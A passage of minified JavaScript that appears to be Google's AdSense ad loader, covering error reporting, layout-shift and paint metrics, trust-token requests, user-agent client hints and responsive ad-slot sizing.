*(?:;|$)/gm;for(c={};d=a.exec(b);)c[d[1]]=pn(d[2]);b=c.google_ad_client?c.google_ad_client:""}else b=""}return null!=(f=b)?f:""};var rn="undefined"===typeof sttc?void 0:sttc;function sn(a){var b=Ui;try{return Yf(a,Zf),new Rk(JSON.parse(a))}catch(c){b.I(838,c instanceof Error?c:Error(String(c)),void 0,function(d){d.jspb=String(a)})}return new Rk};var tn=O(yf).h(mf.h,mf.defaultValue);function un(){var a=L.document;a=void 0===a?window.document:a;ed(tn,a)};var vn=O(yf).h(nf.h,nf.defaultValue);function wn(){var a=L.document;a=void 0===a?window.document:a;ed(vn,a)};var xn=ja(["https://pagead2.googlesyndication.com/pagead/js/err_rep.js"]);function yn(){this.h=null;this.j=!1;this.l=Math.random();this.i=this.I;this.m=null}n=yn.prototype;n.Ta=function(a){this.h=a};n.Va=function(a){this.j=a};n.Ua=function(a){this.i=a}; n.I=function(a,b,c,d,e){if((this.j?this.l:Math.random())>(void 0===c?.01:c))return!1;Rh(b)||(b=new Qh(b,{context:a,id:void 0===e?"jserror":e}));if(d||this.h)b.meta={},this.h&&this.h(b.meta),d&&d(b.meta);w.google_js_errors=w.google_js_errors||[];w.google_js_errors.push(b);if(!w.error_rep_loaded){a=nd(xn);var f;Lc(w.document,null!=(f=this.m)?f:hc(qc(a).toString()));w.error_rep_loaded=!0}return!1};n.oa=function(a,b,c){try{return b()}catch(d){if(!this.i(a,d,.01,c,"jserror"))throw d;}}; n.Oa=function(a,b){var c=this;return function(){var d=ta.apply(0,arguments);return c.oa(a,function(){return b.apply(void 0,d)})}};n.Pa=function(a,b){var c=this;b.catch(function(d){d=d?d:"unknown rejection";c.I(a,d instanceof Error?d:Error(d))})};function zn(a,b,c){var d=window;return function(){var e=Yh(),f=3;try{var g=b.apply(this,arguments)}catch(h){f=13;if(c)return c(a,h),g;throw h;}finally{d.google_measure_js_timing&&e&&(e={label:a.toString(),value:e,duration:(Yh()||0)-e,type:f},f=d.google_js_reporting_queue=d.google_js_reporting_queue||[],2048>f.length&&f.push(e))}return g}}function An(a,b){return zn(a,b,function(c,d){(new yn).I(c,d)})};function Bn(a,b){return null==b?"&"+a+"=null":"&"+a+"="+Math.floor(b)}function Cn(a,b){return"&"+a+"="+b.toFixed(3)}function Dn(){var a=new p.Set,b=aj();try{if(!b)return a;for(var c=b.pubads(),d=u(c.getSlots()),e=d.next();!e.done;e=d.next())a.add(e.value.getSlotId().getDomId())}catch(f){}return a}function En(a){a=a.id;return null!=a&&(Dn().has(a)||r(a,"startsWith").call(a,"google_ads_iframe_")||r(a,"startsWith").call(a,"aswift"))} function Fn(a,b,c){if(!a.sources)return!1;switch(Gn(a)){case 2:var d=Hn(a);if(d)return c.some(function(f){return In(d,f)});case 1:var e=Jn(a);if(e)return b.some(function(f){return In(e,f)})}return!1}function Gn(a){if(!a.sources)return 0;a=a.sources.filter(function(b){return b.previousRect&&b.currentRect});if(1<=a.length){a=a[0];if(a.previousRect.top<a.currentRect.top)return 2;if(a.previousRect.top>a.currentRect.top)return 1}return 0}function Jn(a){return Kn(a,function(b){return b.currentRect})} function Hn(a){return Kn(a,function(b){return b.previousRect})}function Kn(a,b){return a.sources.reduce(function(c,d){d=b(d);return c?d&&0!==d.width*d.height?d.top<c.top?d:c:c:d},null)} function Ln(){Mj.call(this);this.i=this.h=this.P=this.O=this.H=0;this.Ba=this.ya=Number.NEGATIVE_INFINITY;this.ua=this.wa=this.xa=this.za=this.Ea=this.m=this.Da=this.U=0;this.va=!1;this.R=this.N=this.C=0;var a=document.querySelector("[data-google-query-id]");this.Ca=a?a.getAttribute("data-google-query-id"):null;this.l=null;this.Aa=!1;this.ga=function(){}}v(Ln,Mj); function Mn(){var a=new Ln;if(P(of)){var b=window;if(!b.google_plmetrics&&window.PerformanceObserver){b.google_plmetrics=!0;b=u(["layout-shift","largest-contentful-paint","first-input","longtask"]);for(var c=b.next();!c.done;c=b.next())c=c.value,Nn(a).observe({type:c,buffered:!0});On(a)}}} function Nn(a){a.l||(a.l=new PerformanceObserver(An(640,function(b){var c=Pn!==window.scrollX||Qn!==window.scrollY?[]:Rn,d=Sn();b=u(b.getEntries());for(var e=b.next();!e.done;e=b.next())switch(e=e.value,e.entryType){case "layout-shift":var f=a;if(!e.hadRecentInput){f.H+=Number(e.value);Number(e.value)>f.O&&(f.O=Number(e.value));f.P+=1;var g=Fn(e,c,d);g&&(f.m+=e.value,f.za++);if(5E3<e.startTime-f.ya||1E3<e.startTime-f.Ba)f.ya=e.startTime,f.h=0,f.i=0;f.Ba=e.startTime;f.h+=e.value;g&&(f.i+=e.value); f.h>f.U&&(f.U=f.h,f.Ea=f.i,f.Da=e.startTime+e.duration)}break;case "largest-contentful-paint":a.xa=Math.floor(e.renderTime||e.loadTime);a.wa=e.size;break;case "first-input":a.ua=Number((e.processingStart-e.startTime).toFixed(3));a.va=!0;break;case "longtask":e=Math.max(0,e.duration-50),a.C+=e,a.N=Math.max(a.N,e),a.R+=1}})));return a.l} function On(a){var b=An(641,function(){var d=document;2==(d.prerendering?3:{visible:1,hidden:2,prerender:3,preview:4,unloaded:5}[d.visibilityState||d.webkitVisibilityState||d.mozVisibilityState||""]||0)&&Tn(a)}),c=An(641,function(){return void Tn(a)});document.addEventListener("visibilitychange",b);document.addEventListener("unload",c);a.ga=function(){document.removeEventListener("visibilitychange",b);document.removeEventListener("unload",c);Nn(a).disconnect()}} Ln.prototype.j=function(){Mj.prototype.j.call(this);this.ga()}; function Tn(a){if(!a.Aa){a.Aa=!0;Nn(a).takeRecords();var b="https://pagead2.googlesyndication.com/pagead/gen_204?id=plmetrics";window.LayoutShift&&(b+=Cn("cls",a.H),b+=Cn("mls",a.O),b+=Bn("nls",a.P),window.LayoutShiftAttribution&&(b+=Cn("cas",a.m),b+=Bn("nas",a.za)),b+=Cn("wls",a.U),b+=Cn("tls",a.Da),window.LayoutShiftAttribution&&(b+=Cn("was",a.Ea)));window.LargestContentfulPaint&&(b+=Bn("lcp",a.xa),b+=Bn("lcps",a.wa));window.PerformanceEventTiming&&a.va&&(b+=Bn("fid",a.ua));window.PerformanceLongTaskTiming&& (b+=Bn("cbt",a.C),b+=Bn("mbt",a.N),b+=Bn("nlt",a.R));for(var c=0,d=u(document.getElementsByTagName("iframe")),e=d.next();!e.done;e=d.next())En(e.value)&&c++;b+=Bn("nif",c);b+=Bn("ifi",pd(window));c=O(Oh).h();b+="&eid="+encodeURIComponent(c.join());b+="&top="+(w===w.top?1:0);b+=a.Ca?"&qqid="+encodeURIComponent(a.Ca):Bn("pvsid",fd(w));window.googletag&&(b+="&gpt=1");window.fetch(b,{keepalive:!0,credentials:"include",redirect:"follow",method:"get",mode:"no-cors"});a.A||(a.A=!0,a.j())}} function In(a,b){var c=Math.min(a.right,b.right)-Math.max(a.left,b.left);a=Math.min(a.bottom,b.bottom)-Math.max(a.top,b.top);return 0>=c||0>=a?!1:50<=100*c*a/((b.right-b.left)*(b.bottom-b.top))} function Sn(){var a=[].concat(ka(document.getElementsByTagName("iframe"))).filter(En),b=[].concat(ka(Dn())).map(function(c){return document.getElementById(c)}).filter(function(c){return null!==c});Pn=window.scrollX;Qn=window.scrollY;return Rn=[].concat(ka(a),ka(b)).map(function(c){return c.getBoundingClientRect()})}var Pn=void 0,Qn=void 0,Rn=[];var X={issuerOrigin:"https://attestation.android.com",issuancePath:"/att/i",redemptionPath:"/att/r"},Y={issuerOrigin:"https://pagead2.googlesyndication.com",issuancePath:"/dtt/i",redemptionPath:"/dtt/r",getStatePath:"/dtt/s"};var Un=O(yf).h(wf.h,wf.defaultValue); function Vn(a,b,c){Mj.call(this);var d=this;this.i=a;this.h=[];b&&Wn()&&this.h.push(X);c&&this.h.push(Y);if(document.hasTrustToken&&!P(tf)){var e=new p.Map;this.h.forEach(function(f){e.set(f.issuerOrigin,{issuerOrigin:f.issuerOrigin,state:d.i?1:12,hasRedemptionRecord:!1})});window.goog_tt_state_map=window.goog_tt_state_map&&window.goog_tt_state_map instanceof p.Map?new p.Map([].concat(ka(e),ka(window.goog_tt_state_map))):e;window.goog_tt_promise_map&&window.goog_tt_promise_map instanceof p.Map||(window.goog_tt_promise_map= new p.Map)}}v(Vn,Mj);function Wn(){var a=void 0===a?window:a;a=a.navigator.userAgent;var b=/Chrome/.test(a);return/Android/.test(a)&&b}function Xn(){var a=void 0===a?window.document:a;ed(Un,a)}function Yn(a,b){return a||".google.ch"===b||"function"===typeof L.__tcfapi}function Z(a,b,c){var d,e=null==(d=window.goog_tt_state_map)?void 0:d.get(a);e&&(e.state=b,void 0!=c&&(e.hasRedemptionRecord=c))} function Zn(){var a=X.issuerOrigin+X.redemptionPath,b={keepalive:!0,trustToken:{type:"token-redemption",issuer:X.issuerOrigin,refreshPolicy:"none"}};Z(X.issuerOrigin,2);return window.fetch(a,b).then(function(c){if(!c.ok)throw Error(c.status+": Network response was not ok!");Z(X.issuerOrigin,6,!0)}).catch(function(c){c&&"NoModificationAllowedError"===c.name?Z(X.issuerOrigin,6,!0):Z(X.issuerOrigin,5)})} function $n(){var a=X.issuerOrigin+X.issuancePath;Z(X.issuerOrigin,8);return window.fetch(a,{keepalive:!0,trustToken:{type:"token-request"}}).then(function(b){if(!b.ok)throw Error(b.status+": Network response was not ok!");Z(X.issuerOrigin,10);return Zn()}).catch(function(b){if(b&&"NoModificationAllowedError"===b.name)return Z(X.issuerOrigin,10),Zn();Z(X.issuerOrigin,9)})}function ao(){Z(X.issuerOrigin,13);return document.hasTrustToken(X.issuerOrigin).then(function(a){return a?Zn():$n()})} function bo(){Z(Y.issuerOrigin,13);if(p.Promise){var a=document.hasTrustToken(Y.issuerOrigin).then(function(e){return e}).catch(function(e){return p.Promise.reject({state:19,error:e})}),b=Y.issuerOrigin+Y.redemptionPath,c={keepalive:!0,trustToken:{type:"token-redemption",refreshPolicy:"none"}};Z(Y.issuerOrigin,16);a=a.then(function(e){return window.fetch(b,c).then(function(f){if(!f.ok)throw Error(f.status+": Network response was not ok!");Z(Y.issuerOrigin,18,!0)}).catch(function(f){if(f&&"NoModificationAllowedError"=== f.name)Z(Y.issuerOrigin,18,!0);else{if(e)return p.Promise.reject({state:17,error:f});Z(Y.issuerOrigin,17)}})}).then(function(){return document.hasTrustToken(Y.issuerOrigin).then(function(e){return e}).catch(function(e){return p.Promise.reject({state:19,error:e})})}).then(function(e){var f=Y.issuerOrigin+Y.getStatePath;Z(Y.issuerOrigin,20);return window.fetch(f+"?ht="+e,{trustToken:{type:"send-redemption-record",issuers:[Y.issuerOrigin]}}).then(function(g){if(!g.ok)throw Error(g.status+": Network response was not ok!"); Z(Y.issuerOrigin,22);return g.text().then(function(h){return JSON.parse(h)})}).catch(function(g){return p.Promise.reject({state:21,error:g})})});var d=fd(window);return a.then(function(e){var f=Y.issuerOrigin+Y.issuancePath;return e&&e.srqt&&e.cs?(Z(Y.issuerOrigin,23),window.fetch(f+"?cs="+e.cs+"&correlator="+d,{keepalive:!0,trustToken:{type:"token-request"}}).then(function(g){if(!g.ok)throw Error(g.status+": Network response was not ok!");Z(Y.issuerOrigin,25);return e}).catch(function(g){return p.Promise.reject({state:24, error:g})})):e}).then(function(e){if(e&&e.srdt&&e.cs)return Z(Y.issuerOrigin,26),window.fetch(b+"?cs="+e.cs+"&correlator="+d,{keepalive:!0,trustToken:{type:"token-redemption",refreshPolicy:"refresh"}}).then(function(f){if(!f.ok)throw Error(f.status+": Network response was not ok!");Z(Y.issuerOrigin,28,!0)}).catch(function(f){return p.Promise.reject({state:27,error:f})})}).then(function(){Z(Y.issuerOrigin,29)}).catch(function(e){if(e instanceof Object&&e.hasOwnProperty("state")&&e.hasOwnProperty("error"))if("number"=== typeof e.state&&e.error instanceof Error){Z(Y.issuerOrigin,e.state);var f=Q(vf);Math.random()<=f&&Ff({state:e.state,err:e.error.toString()})}else throw Error(e);else throw e;})}} function co(a){if(document.hasTrustToken&&!P(tf)&&a.i){var b=window.goog_tt_promise_map;if(b&&b instanceof p.Map){var c=[];if(a.h.some(function(e){return e.issuerOrigin===X.issuerOrigin})){var d=b.get(X.issuerOrigin);d||(d=ao(),b.set(X.issuerOrigin,d));c.push(d)}a.h.some(function(e){return e.issuerOrigin===Y.issuerOrigin})&&(a=b.get(Y.issuerOrigin),a||(a=bo(),b.set(Y.issuerOrigin,a)),c.push(a));if(0<c.length&&p.Promise&&p.Promise.all)return p.Promise.all(c)}}};function eo(a){J.call(this,a,-1,fo)}v(eo,J);function go(a,b){return B(a,2,b)}function ho(a,b){return B(a,3,b)}function io(a,b){return B(a,4,b)}function jo(a,b){return B(a,5,b)}function ko(a,b){return B(a,9,b)}function lo(a,b){return Gb(a,10,b)}function mo(a,b){return B(a,11,b)}function no(a,b){return B(a,1,b)}function oo(a){J.call(this,a)}v(oo,J);oo.prototype.getVersion=function(){return I(this,2)};var fo=[10,6];var po="platform platformVersion architecture model uaFullVersion bitness fullVersionList wow64".split(" ");function qo(){var a;return null!=(a=L.google_tag_data)?a:L.google_tag_data={}} function ro(){var a,b;if("function"!==typeof(null==(a=L.navigator)?void 0:null==(b=a.userAgentData)?void 0:b.getHighEntropyValues))return null;var c=qo();if(c.uach_promise)return c.uach_promise;a=L.navigator.userAgentData.getHighEntropyValues(po).then(function(d){null!=c.uach||(c.uach=d);return d});return c.uach_promise=a} function so(a){var b;return mo(lo(ko(jo(io(ho(go(no(new eo,a.platform||""),a.platformVersion||""),a.architecture||""),a.model||""),a.uaFullVersion||""),a.bitness||""),(null==(b=a.fullVersionList)?void 0:b.map(function(c){var d=new oo;d=B(d,1,c.brand);return B(d,2,c.version)}))||[]),a.wow64||!1)} function to(){if(P(pf)){var a,b;return null!=(b=null==(a=ro())?void 0:a.then(function(f){return so(f)}))?b:null}var c,d;if("function"!==typeof(null==(c=L.navigator)?void 0:null==(d=c.userAgentData)?void 0:d.getHighEntropyValues))return null;var e;return null!=(e=L.navigator.userAgentData.getHighEntropyValues(po).then(function(f){return so(f)}))?e:null};function uo(a,b){b.google_ad_host||(a=vo(a))&&(b.google_ad_host=a)}function wo(a,b,c){c=void 0===c?"":c;L.google_sa_impl&&!L.document.getElementById("google_shimpl")&&(delete L.google_sa_queue,delete L.google_sa_impl);L.google_sa_queue||(L.google_sa_queue=[],L.google_process_slots=Xi(215,function(){return xo(L.google_sa_queue)}),a=yo(c,a,b),Lc(L.document,a).id="google_shimpl")} function xo(a){var b=a.shift();"function"===typeof b&&Wi(216,b);a.length&&w.setTimeout(Xi(215,function(){return xo(a)}),0)}function zo(a,b,c){a.google_sa_queue=a.google_sa_queue||[];a.google_sa_impl?c(b):a.google_sa_queue.push(b)} function yo(a,b,c){var d=Math.random()<Q(bf)?hc(qc(b.pb).toString()):null;b=D(c,4)?b.ob:b.qb;d=d?d:hc(qc(b).toString());b={};a:{if(D(c,4)){if(c=a||qn(L)){var e={};c=(e.client=c,e.plah=L.location.host,e);break a}throw Error("PublisherCodeNotFoundForAma");}c={}}Ao(c,b);a:{if(P($e)||P(Oe)){a=a||qn(L);var f;var g=(c=null==(g=U(L))?void 0:null==(f=g.head_tag_slot_vars)?void 0:f.google_ad_host)?c:vo(L);if(a){f={};g=(f.client=a,f.plah=L.location.host,f.ama_t="adsense",f.asntp=Q(Ge),f.asntpv=Q(Ke),f.asntpl= Q(Ie),f.asntpm=Q(Je),f.asntpc=Q(He),f.asna=Q(Ce),f.asnd=Q(De),f.asnp=Q(Ee),f.asns=Q(Fe),f.asmat=Q(Be),f.asptt=Q(Le),f.easpi=P($e),f.asro=P(Me),f.host=g,f.easai=P(Ze),f);break a}}g={}}Ao(g,b);Ao(zf()?{bust:zf()}:{},b);return ec(d,b)}function Ao(a,b){Sc(a,function(c,d){void 0===b[d]&&(b[d]=c)})}function vo(a){if(a=a.document.querySelector('meta[name="google-adsense-platform-account"]'))return a.getAttribute("content")} function Bo(a){a:{var b=void 0===b?!1:b;var c=void 0===c?1024:c;for(var d=[w.top],e=[],f=0,g;g=d[f++];){b&&!Hc(g)||e.push(g);try{if(g.frames)for(var h=0;h<g.frames.length&&d.length<c;++h)d.push(g.frames[h])}catch(l){}}for(b=0;b<e.length;b++)try{var k=e[b].frames.google_esf;if(k){id=k;break a}}catch(l){}id=null}if(id)return null;e=Mc("IFRAME");e.id="google_esf";e.name="google_esf";e.src=sc(a.vb);e.style.display="none";return e} function Co(a,b,c,d){Do(a,b,c,d,function(e,f){e=e.document;for(var g=void 0,h=0;!g||e.getElementById(g+"_anchor");)g="aswift_"+h++;e=g;g=Number(f.google_ad_width||0);f=Number(f.google_ad_height||0);h=Mc("INS");h.id=e+"_anchor";pm(h,g,f);h.style.display="block";var k=Mc("INS");k.id=e+"_expand";pm(k,g,f);k.style.display="inline-table";k.appendChild(h);c.appendChild(k);return e})} function Do(a,b,c,d,e){e=e(a,b);Eo(a,c,b);c=Ia;var f=(new Date).getTime();b.google_lrv=I(d,2);b.google_async_iframe_id=e;b.google_start_time=c;b.google_bpp=f>c?f-c:1;a.google_sv_map=a.google_sv_map||{};a.google_sv_map[e]=b;d=a.document.getElementById(e+"_anchor")?function(h){return h()}:function(h){return window.setTimeout(h,0)};var g={pubWin:a,vars:b};zo(a,function(){var h=a.google_sa_impl(g);h&&h.catch&&Zi(911,h)},d)} function Eo(a,b,c){var d=c.google_ad_output,e=c.google_ad_format,f=c.google_ad_width||0,g=c.google_ad_height||0;e||"html"!=d&&null!=d||(e=f+"x"+g);d=!c.google_ad_slot||c.google_override_format||!qm[c.google_ad_width+"x"+c.google_ad_height]&&"aa"==c.google_loader_used;e&&d?e=e.toLowerCase():e="";c.google_ad_format=e;if("number"!==typeof c.google_reactive_sra_index||!c.google_ad_unit_key){e=[c.google_ad_slot,c.google_orig_ad_format||c.google_ad_format,c.google_ad_type,c.google_orig_ad_width||c.google_ad_width, c.google_orig_ad_height||c.google_ad_height];d=[];f=0;for(g=b;g&&25>f;g=g.parentNode,++f)9===g.nodeType?d.push(""):d.push(g.id);(d=d.join())&&e.push(d);c.google_ad_unit_key=Tc(e.join(":")).toString();var h=void 0===h?!1:h;e=[];for(d=0;b&&25>d;++d){f="";void 0!==h&&h||(f=(f=9!==b.nodeType&&b.id)?"/"+f:"");a:{if(b&&b.nodeName&&b.parentElement){g=b.nodeName.toString().toLowerCase();for(var k=b.parentElement.childNodes,l=0,m=0;m<k.length;++m){var q=k[m];if(q.nodeName&&q.nodeName.toString().toLowerCase()=== g){if(b===q){g="."+l;break a}++l}}}g=""}e.push((b.nodeName&&b.nodeName.toString().toLowerCase())+f+g);b=b.parentElement}h=e.join()+":";b=[];if(a)try{var t=a.parent;for(e=0;t&&t!==a&&25>e;++e){var y=t.frames;for(d=0;d<y.length;++d)if(a===y[d]){b.push(d);break}a=t;t=a.parent}}catch(F){}c.google_ad_dom_fingerprint=Tc(h+b.join()).toString()}}function Fo(){var a=Ic(w);a&&(a=Uf(a),a.tagSpecificState[1]||(a.tagSpecificState[1]={debugCard:null,debugCardRequested:!1}))} function Go(a){Xn();Yn(Wk(),I(a,8))||Xi(779,function(){var b=window;b=void 0===b?window:b;b=P(b.PeriodicSyncManager?rf:sf);var c=P(uf);b=new Vn(!0,b,c);0<Q(xf)?L.google_trust_token_operation_promise=co(b):co(b)})();a=to();null!=a&&a.then(function(b){L.google_user_agent_client_hint=Lb(b)});wn();un()};function Ho(a,b){switch(a){case "google_reactive_ad_format":return a=parseInt(b,10),isNaN(a)?0:a;case "google_allow_expandable_ads":return/^true$/.test(b);default:return b}} function Io(a,b){if(a.getAttribute("src")){var c=a.getAttribute("src")||"";(c=Gc(c))&&(b.google_ad_client=Ho("google_ad_client",c))}a=a.attributes;c=a.length;for(var d=0;d<c;d++){var e=a[d];if(/data-/.test(e.name)){var f=Ja(e.name.replace("data-matched-content","google_content_recommendation").replace("data","google").replace(/-/g,"_"));b.hasOwnProperty(f)||(e=Ho(f,e.value),null!==e&&(b[f]=e))}}} function Jo(a){if(a=ld(a))switch(a.data&&a.data.autoFormat){case "rspv":return 13;case "mcrspv":return 15;default:return 14}else return 12} function Ko(a,b,c,d){Io(a,b);if(c.document&&c.document.body&&!Zm(c,b)&&!b.google_reactive_ad_format){var e=parseInt(a.style.width,10),f=cn(a,c);if(0<f&&e>f){var g=parseInt(a.style.height,10);e=!!qm[e+"x"+g];var h=f;if(e){var k=rm(f,g);if(k)h=k,b.google_ad_format=k+"x"+g+"_0ads_al";else throw new T("No slot size for availableWidth="+f);}b.google_ad_resize=!0;b.google_ad_width=h;e||(b.google_ad_format=null,b.google_override_format=!0);f=h;a.style.width=f+"px";g=Tm(f,"auto",c,a,b);h=f;g.size().i(c,b, a);Dm(g,h,b);g=g.size();b.google_responsive_formats=null;g.minWidth()>f&&!e&&(b.google_ad_width=g.minWidth(),a.style.width=g.minWidth()+"px")}}e=a.offsetWidth||xi(a,c,"width",K)||b.google_ad_width||0;f=Fa(Tm,e,"auto",c,a,b,!1,!0);if(!P(Xe)&&488>Wf(c)){g=Ic(c)||c;h=b.google_ad_client;d=g.location&&"#ftptohbh"===g.location.hash?2:yl(g.location,"google_responsive_slot_preview")||P(ef)?1:P(df)?2:Yk(g,1,h,d)?1:0;if(g=0!==d)b:if(b.google_reactive_ad_format||Zm(c,b)||mi(a,b))g=!1;else{for(g=a;g;g=g.parentElement){h= Nc(g,c);if(!h){b.gfwrnwer=18;g=!1;break b}if(!Xa(["static","relative"],h.position)){b.gfwrnwer=17;g=!1;break b}}g=qi(c,a,e,.3,b);!0!==g?(b.gfwrnwer=g,g=!1):g=c===c.top?!0:!1}g?(b.google_resizing_allowed=!0,b.ovlp=!0,2===d?(d={},Dm(f(),e,d),b.google_resizing_width=d.google_ad_width,b.google_resizing_height=d.google_ad_height,b.iaaso=!1):(b.google_ad_format="auto",b.iaaso=!0,b.armr=1),d=!0):d=!1}else d=!1;if(e=Zm(c,b))an(e,a,b,c,d);else{if(mi(a,b)){if(d=Nc(a,c))a.style.width=d.width,a.style.height= d.height,li(d,b);b.google_ad_width||(b.google_ad_width=a.offsetWidth);b.google_ad_height||(b.google_ad_height=a.offsetHeight);b.google_loader_features_used=256;b.google_responsive_auto_format=Jo(c)}else li(a.style,b);c.location&&"#gfwmrp"==c.location.hash||12==b.google_responsive_auto_format&&"true"==b.google_full_width_responsive?an(10,a,b,c,!1):.01>Math.random()&&12===b.google_responsive_auto_format&&(a=ri(a.offsetWidth||parseInt(a.style.width,10)||b.google_ad_width,c,a,b),!0!==a?(b.efwr=!1,b.gfwrnwer= a):b.efwr=!0)}};function Lo(a){this.j=new p.Set;this.u=md()||window;this.h=Q(ze);var b=0<this.h&&Rc()<1/this.h;this.A=(this.i=!!Hj(Dj(),30,b))?fd(this.u):0;this.m=this.i?qn(this.u):"";this.l=null!=a?a:new yg(100)}function Mo(){var a=O(Lo);var b=new qk;b=B(b,1,Vf(a.u).scrollWidth);b=B(b,2,Vf(a.u).scrollHeight);var c=new qk;c=B(c,1,Wf(a.u));c=B(c,2,Vf(a.u).clientHeight);var d=new sk;d=B(d,1,a.A);d=B(d,2,a.m);d=B(d,3,a.h);var e=new rk;b=Eb(e,2,b);b=Eb(b,1,c);b=Fb(d,4,tk,b);a.i&&!a.j.has(1)&&(a.j.add(1),ug(a.l,b))};function No(a){var b=window;var c=void 0===c?null:c;xc(b,"message",function(d){try{var e=JSON.parse(d.data)}catch(f){return}!e||"sc-cnf"!==e.googMsgType||c&&/[:|%3A]javascript\(/i.test(d.data)&&!c(e,d)||a(e,d)})};function Oo(a,b){b=void 0===b?500:b;Mj.call(this);this.i=a;this.ta=b;this.h=null;this.m={};this.l=null}v(Oo,Mj);Oo.prototype.j=function(){this.m={};this.l&&(yc(this.i,this.l),delete this.l);delete this.m;delete this.i;delete this.h;Mj.prototype.j.call(this)};function Po(a){Mj.call(this);this.h=a;this.i=null;this.l=!1}v(Po,Mj);var Qo=null,Ro=[],So=new p.Map,To=-1;function Uo(a){return Fi.test(a.className)&&"done"!=a.dataset.adsbygoogleStatus}function Vo(a,b,c){a.dataset.adsbygoogleStatus="done";Wo(a,b,c)} function Wo(a,b,c){var d=window;d.google_spfd||(d.google_spfd=Ko);var e=b.google_reactive_ads_config;e||Ko(a,b,d,c);uo(d,b);if(!Xo(a,b,d)){e||(d.google_lpabyc=ni(a,d)+xi(a,d,"height",K));if(e){e=e.page_level_pubvars||{};if(U(L).page_contains_reactive_tag&&!U(L).allow_second_reactive_tag){if(e.pltais){wl(!1);return}throw new T("Only one 'enable_page_level_ads' allowed per page.");}U(L).page_contains_reactive_tag=!0;wl(7===e.google_pgb_reactive)}b.google_unique_id=od(d);Sc(mn,function(f,g){b[g]=b[g]|| d[g]});b.google_loader_used="aa";b.google_reactive_tag_first=1===(U(L).first_tag_on_page||0);Wi(164,function(){Co(d,b,a,c)})}} function Xo(a,b,c){var d=b.google_reactive_ads_config,e="string"===typeof a.className&&RegExp("(\\W|^)adsbygoogle-noablate(\\W|$)").test(a.className),f=ul(c);if(f&&f.Fa&&"on"!=b.google_adtest&&!e){e=ni(a,c);var g=Vf(c).clientHeight;if(!f.qa||f.qa&&((0==g?null:e/g)||0)>=f.qa)return a.className+=" adsbygoogle-ablated-ad-slot",c=c.google_sv_map=c.google_sv_map||{},d=za(a),b.google_element_uid=d,c[b.google_element_uid]=b,a.setAttribute("google_element_uid",d),"slot"==f.tb&&(null!==Zc(a.getAttribute("width"))&& a.setAttribute("width",0),null!==Zc(a.getAttribute("height"))&&a.setAttribute("height",0),a.style.width="0px",a.style.height="0px"),!0}if((f=Nc(a,c))&&"none"==f.display&&!("on"==b.google_adtest||0<b.google_reactive_ad_format||d))return c.document.createComment&&a.appendChild(c.document.createComment("No ad requested because of display:none on the adsbygoogle tag")),!0;a=null==b.google_pgb_reactive||3===b.google_pgb_reactive;return 1!==b.google_reactive_ad_format&&8!==b.google_reactive_ad_format|| !a?!1:(w.console&&w.console.warn("Adsbygoogle tag with data-reactive-ad-format="+b.google_reactive_ad_format+" is deprecated. Check out page-level ads at https://www.google.com/adsense"),!0)}function Yo(a){var b=document.getElementsByTagName("INS");for(var c=0,d=b[c];c<b.length;d=b[++c]){var e=d;if(Uo(e)&&"reserved"!=e.dataset.adsbygoogleStatus&&(!a||d.id==a))return d}return null} function Zo(a,b,c){if(a&&a.shift)for(var d=20;0<a.length&&0<d;){try{$o(a.shift(),b,c)}catch(e){setTimeout(function(){throw e;})}--d}}function ap(){var a=Mc("INS");a.className="adsbygoogle";a.className+=" adsbygoogle-noablate";bd(a);return a} function bp(a,b){var c={};Sc(Rf,function(f,g){!1===a.enable_page_level_ads?c[g]=!1:a.hasOwnProperty(g)&&(c[g]=a[g])});ya(a.enable_page_level_ads)&&(c.page_level_pubvars=a.enable_page_level_ads);var d=ap();hd.body.appendChild(d);var e={};e=(e.google_reactive_ads_config=c,e.google_ad_client=a.google_ad_client,e);e.google_pause_ad_requests=!!U(L).pause_ad_requests;Vo(d,e,b)} function cp(a,b){function c(){return bp(a,b)}Uf(w).wasPlaTagProcessed=!0;var d=w.document;if(d.body||"complete"==d.readyState||"interactive"==d.readyState)c();else{var e=wc(Xi(191,c));xc(d,"DOMContentLoaded",e);(new w.MutationObserver(function(f,g){d.body&&(e(),g.disconnect())})).observe(d,{childList:!0,subtree:!0})}} function $o(a,b,c){var d={};Wi(165,function(){dp(a,d,b,c)},function(e){e.client=e.client||d.google_ad_client||a.google_ad_client;e.slotname=e.slotname||d.google_ad_slot;e.tag_origin=e.tag_origin||d.google_tag_origin})}function ep(a){delete a.google_checked_head;Sc(a,function(b,c){Ei[c]||(delete a[c],w.console.warn("AdSense head tag doesn't support "+c.replace("google","data").replace(/_/g,"-")+" attribute."))})} function fp(a,b){var c=L.document.querySelector('script[src*="/pagead/js/adsbygoogle.js?client="]:not([data-checked-head])')||L.document.querySelector('script[src*="/pagead/js/adsbygoogle.js"][data-ad-client]:not([data-checked-head])');if(c){c.setAttribute("data-checked-head","true");var d=U(window);if(d.head_tag_slot_vars)gp(c);else{var e={};Io(c,e);ep(e);var f=$b(e);d.head_tag_slot_vars=f;c={google_ad_client:e.google_ad_client,enable_page_level_ads:e};L.adsbygoogle||(L.adsbygoogle=[]);d=L.adsbygoogle; d.loaded?d.push(c):d.splice(0,0,c);var g;e.google_adbreak_test||(null==(g=Ib(b,Fk,13,Uk))?0:D(g,3))&&P(jf)?hp(f,a):No(function(){hp(f,a)})}}}function gp(a){var b=U(window).head_tag_slot_vars,c=a.getAttribute("src")||"";if((a=Gc(c)||a.getAttribute("data-ad-client")||"")&&a!==b.google_ad_client)throw new T("Warning: Do not add multiple property codes with AdSense tag to avoid seeing unexpected behavior. These codes were found on the page "+a+", "+b.google_ad_client);} function ip(a){if("object"===typeof a&&null!=a){if("string"===typeof a.type)return 2;if("string"===typeof a.sound||"string"===typeof a.preloadAdBreaks)return 3}return 0} function dp(a,b,c,d){if(null==a)throw new T("push() called with no parameters.");14===Cb(d,Uk)&&jp(a,wb(Tk(d),1),I(d,2));var e=ip(a);if(0!==e)P(af)&&(d=xl(),d.first_slotcar_request_processing_time||(d.first_slotcar_request_processing_time=Date.now(),d.adsbygoogle_execution_start_time=Ia)),null==Qo?(kp(a),Ro.push(a)):3===e?Wi(787,function(){Qo.handleAdConfig(a)}):Zi(730,Qo.handleAdBreak(a));else{Ia=(new Date).getTime();wo(c,d,lp(a));mp();a:{if(void 0!=a.enable_page_level_ads){if("string"===typeof a.google_ad_client){e= !0;break a}throw new T("'google_ad_client' is missing from the tag config.");}e=!1}if(e)np(a,d);else if((e=a.params)&&Sc(e,function(g,h){b[h]=g}),"js"===b.google_ad_output)console.warn("Ads with google_ad_output='js' have been deprecated and no longer work. Contact your AdSense account manager or switch to standard AdSense 